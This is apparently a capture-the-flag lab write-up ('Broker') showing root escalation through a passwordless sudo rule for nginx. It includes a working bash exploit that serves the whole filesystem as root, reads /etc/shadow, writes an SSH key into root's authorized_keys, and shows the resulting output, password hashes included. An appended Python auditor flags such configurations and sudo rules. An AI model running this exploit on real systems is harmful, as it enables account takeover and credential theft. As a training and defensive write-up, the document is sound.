nginx
The compromised activemq account has sudo privileges to execute nginx without being prompted for a password.
Allowing a user to run a web server such as nginx with sudo is a significant security lapse. Because the user supplies the configuration file, the entire filesystem can be served over HTTP, effectively granting unauthorized access to every file on the system.
Following a successful compromise, the attacker gains complete control over the target system, with the ability to manipulate, exfiltrate, or destroy sensitive data. Running nginx under sudo in this context drastically amplifies the impact of the breach, turning a web server into a means of unauthorized control.
This vulnerability poses an imminent threat to the confidentiality, integrity, and availability of the target system.
#!/bin/bash
echo "[+] making config"
# Config that runs workers as root, uses / as the document root,
# lists directories, and accepts WebDAV PUT requests.
cat <<EOF >/tmp/nginx.conf
user root;
worker_processes 4;
pid /tmp/nginx.pid;
events {
    worker_connections 1234;
}
http {
    server {
        listen 8888;
        root /;
        autoindex on;
        dav_methods PUT;
    }
}
EOF
echo "[+] Launching..."
# The sudo rule allows nginx without a password; -c points it at the config above.
sudo -u root /usr/sbin/nginx -c /tmp/nginx.conf
echo "[+] Reading /etc/shadow..."
curl http://localhost:8888/etc/shadow
echo "[+] Writing to /root/.ssh/authorized_keys..."
# -X PUT selects the request method (lowercase -x would set a proxy instead).
curl -X PUT http://localhost:8888/root/.ssh/authorized_keys -d 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGoUoI9LYwEoMSDFaLZNQ51dLFNZf27nQjV7fooImm5g kali@kali'
The above simple bash script performs the following actions:
- generates an nginx configuration file that serves the entire filesystem over port 8888 for read access, with support for PUT requests for write access
- starts an nginx web server with that configuration file as the root user
- confirms read access by fetching the /etc/shadow file
- confirms write access by writing kali's SSH public key to the authorized_keys file of the root user via a PUT request
Given that the target system allows the root user SSH access, it is very likely that the SSH directory and/or the authorized_keys file already exist, which the PUT request relies on, since it does not create missing parent directories.
activemq@broker:/tmp$ ./pe.sh
[+] making config
[+] Launching...
[+] Reading /etc/shadow...
root:$y$j9T$S6NkiGlTDU3IUcdBZEjJe0$sSHRUiGL/v4FZkWjU.HZ6cX2vsMY/rdFBTt25LbGxf1:19666:0:99999:7:::
daemon:*:19405:0:99999:7:::
bin:*:19405:0:99999:7:::
sys:*:19405:0:99999:7:::
sync:*:19405:0:99999:7:::
games:*:19405:0:99999:7:::
man:*:19405:0:99999:7:::
lp:*:19405:0:99999:7:::
mail:*:19405:0:99999:7:::
news:*:19405:0:99999:7:::
uucp:*:19405:0:99999:7:::
proxy:*:19405:0:99999:7:::
www-data:*:19405:0:99999:7:::
backup:*:19405:0:99999:7:::
list:*:19405:0:99999:7:::
irc:*:19405:0:99999:7:::
gnats:*:19405:0:99999:7:::
nobody:*:19405:0:99999:7:::
_apt:*:19405:0:99999:7:::
systemd-network:*:19405:0:99999:7:::
systemd-resolve:*:19405:0:99999:7:::
messagebus:*:19405:0:99999:7:::
systemd-timesync:*:19405:0:99999:7:::
pollinate:*:19405:0:99999:7:::
sshd:*:19405:0:99999:7:::
syslog:*:19405:0:99999:7:::
uuidd:*:19405:0:99999:7:::
tcpdump:*:19405:0:99999:7:::
tss:*:19405:0:99999:7:::
landscape:*:19405:0:99999:7:::
fwupd-refresh:*:19405:0:99999:7:::
usbmux:*:19474:0:99999:7:::
lxd:!:19474::::::
activemq:$y$j9T$5eMce1NhiF0t9/ZVwn39P1$pCfvgXtARGXPYDdn2AVdkCnXDf7YO7He/x666g6qLM5:19666:0:99999:7:::
_laurel:!:19667::::::
[+] Writing to /root/.ssh/authorized_keys...
Complete
┌──(kali㉿kali)-[~/archive/htb/labs/broker]
└─$ ssh root@$IP
Enter passphrase for key '/home/kali/.ssh/id_ed25519':
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-88-generic x86_64)
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
  System information as of Thu Dec 14 01:25:43 AM UTC 2023
  System load:           0.00244140625
  Usage of /:            87.4% of 4.63GB
  Memory usage:          24%
  Swap usage:            0%
  Processes:             193
  Users logged in:       1
  IPv4 address for eth0: 10.10.11.243
  IPv6 address for eth0: dead:beef::250:56ff:feb9:21e9
  => / is using 87.4% of 4.63GB
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
root@broker:~# whoami
root
root@broker:~# hostname
broker
root@broker:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.11.243 netmask 255.255.254.0 broadcast 10.10.11.255
inet6 fe80::250:56ff:feb9:21e9 prefixlen 64 scopeid 0x20<link>
inet6 dead:beef::250:56ff:feb9:21e9 prefixlen 64 scopeid 0x0<global>
ether 00:50:56:b9:21:e9 txqueuelen 1000 (Ethernet)
RX packets 1419404 bytes 209446608 (209.4 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 1490170 bytes 668635230 (668.6 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 5494507 bytes 843368356 (843.3 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 5494507 bytes 843368356 (843.3 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
System Level Compromise
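As an added defensive check (not part of the write-up), the following Python audit flags the nginx directives that make the configuration above a filesystem gateway, and the sudoers rule that lets an unprivileged user start nginx as root. The sample configs and sudoers lines are constructed for the example; the page does not show the actual sudoers entry.

```python
import re

# Constructed sample: the configuration the write-up's script generates.
RISKY_CONFIG = """user root; worker_processes 4; pid /tmp/nginx.pid;
events { worker_connections 1234; }
http { server { listen 8888; root /; autoindex on; dav_methods PUT; } }"""
# Constructed sample: a conventional, confined server block for comparison.
HARDENED_CONFIG = "user www-data; http { server { listen 8888; root /var/www/html; autoindex off; } }"
# Constructed sudoers lines; the NOPASSWD nginx rule mirrors the write-up's finding.
SUDOERS_SAMPLE = [
    "root     ALL=(ALL:ALL) ALL",
    "activemq ALL=(ALL) NOPASSWD: /usr/sbin/nginx",
]
WRITE_METHODS = {"PUT", "DELETE", "MKCOL", "COPY", "MOVE"}
# user  host=(runas)  tag:...  commands   (Defaults and alias lines do not match)
SUDO_RULE = re.compile(r"^(?P<user>\S+)\s+\S+=\s*(\([^)]*\))?\s*(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$")

def parse_directives(conf):
    """Flatten nginx config into (name, args) pairs; comments stripped, braces end statements."""
    text = re.sub(r"#.*", "", conf).replace("{", ";").replace("}", ";")
    return [(p[0], p[1:]) for p in (s.split() for s in text.split(";")) if p]

def audit_nginx_config(conf):
    """Flag directives that turn nginx into a root-level filesystem read/write gateway."""
    findings = []
    for name, args in parse_directives(conf):
        if name == "user" and args[:1] == ["root"]:
            findings.append("user root: workers run as root, so no file is out of reach")
        elif name == "root" and args[:1] == ["/"]:
            findings.append("root /: the whole filesystem is the document root")
        elif name == "autoindex" and args[:1] == ["on"]:
            findings.append("autoindex on: directory listings reveal the filesystem layout")
        elif name == "dav_methods":
            writes = sorted(WRITE_METHODS & {a.upper() for a in args})
            if writes:
                findings.append(f"dav_methods {' '.join(writes)}: HTTP clients can write files")
    return findings

def audit_sudoers(lines):
    """Return (user, command) for NOPASSWD rules granting nginx (or ALL): nginx -c
    lets the caller supply the config, so such a rule is root access in disguise."""
    hits = []
    for line in lines:
        m = SUDO_RULE.match(line.split("#", 1)[0].strip())
        if m and "NOPASSWD" in m.group("tags"):
            for cmd in (c.strip() for c in m.group("cmds").split(",")):
                if cmd == "ALL" or re.search(r"(^|/)nginx(\s|$)", cmd):
                    hits.append((m.group("user"), cmd))
    return hits
```

Run against a real host by feeding it the contents of /etc/sudoers (and /etc/sudoers.d/*) and any nginx config a sudo rule could reference; a clean result is an empty list from both functions.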